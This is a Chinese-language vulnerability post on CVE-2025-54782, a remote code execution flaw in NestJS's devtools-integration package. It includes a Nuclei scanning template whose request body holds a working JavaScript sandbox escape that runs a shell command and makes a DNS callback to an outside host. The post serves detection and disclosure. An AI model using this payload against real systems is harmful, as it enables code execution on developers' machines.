NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞信息

漏洞名称: NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-54782

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: 受影响的产品是NestJS的DevTools集成包@nestjs/devtools-integration,这是一个用于NestJS框架的开发工具,旨在帮助开发者更高效地进行开发和调试。该包广泛应用于使用NestJS框架的开发环境中,特别是在本地开发阶段。漏洞存在于该包的本地开发HTTP服务器中,具体是一个API端点(/inspector/graph/interact),该端点使用了一个不安全的JavaScript沙箱。由于沙箱的不当实现和缺乏跨域保护,任何恶意网站都可以在访问该网站的开发者本地机器上执行任意代码。这一漏洞的技术根源在于对用户输入的代码没有进行充分的验证和隔离,导致攻击者可以绕过沙箱限制,执行任意命令。这种漏洞的严重性在于,它不需要任何形式的认证,攻击者只需诱使开发者访问恶意网站,即可利用此漏洞在开发者的机器上执行任意代码,可能导致数据泄露、服务中断或其他恶意操作。由于漏洞的利用门槛低,且影响范围广,因此被评定为严重级别。

产品厂商: NestJS

产品名称: @nestjs/devtools-integration

影响版本: <= 0.2.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/07fd1a24d855b126e4c8fba77610b5dd7cbd9fa3/http%2Fcves%2F2025%2FCVE-2025-54782.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: CVE-2025-54782

info:
  name: NestJS DevTools Integration - Remote Code Execution
  author: SeongHyeonJeon[nukunga]
  severity: critical
  description: |
    The @nestjs/devtools-integration package <= 0.2.0 is vulnerable to a Remote Code Execution (RCE) vulnerability.
    The package exposes a local development HTTP server with an API endpoint (/inspector/graph/interact) that uses an unsafe JavaScript sandbox.
    Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
  reference:
    - https://socket.dev/blog/nestjs-rce-vuln
    - https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54782
  classification:
    cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 9.4
    cve-id: CVE-2025-54782
    cwe-id: CWE-77, CWE-352, CWE-78
  tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth

http:
  - method: POST
    path:
      - "{{BaseURL}}/inspector/graph/interact"
    headers:
      Content-Type: "text/plain"
    body: |
      {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "graph"
          - "interact"
        condition: or

      - type: regex
        part: header
        regex:
          - "(?i)content-type.*application/json"

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
NestJS DevTools Integration Remote Code Execution Vulnerability
http://example.com/2025/08/03/github_2710905263/
作者
lianccc
发布于
2025年8月3日
许可协议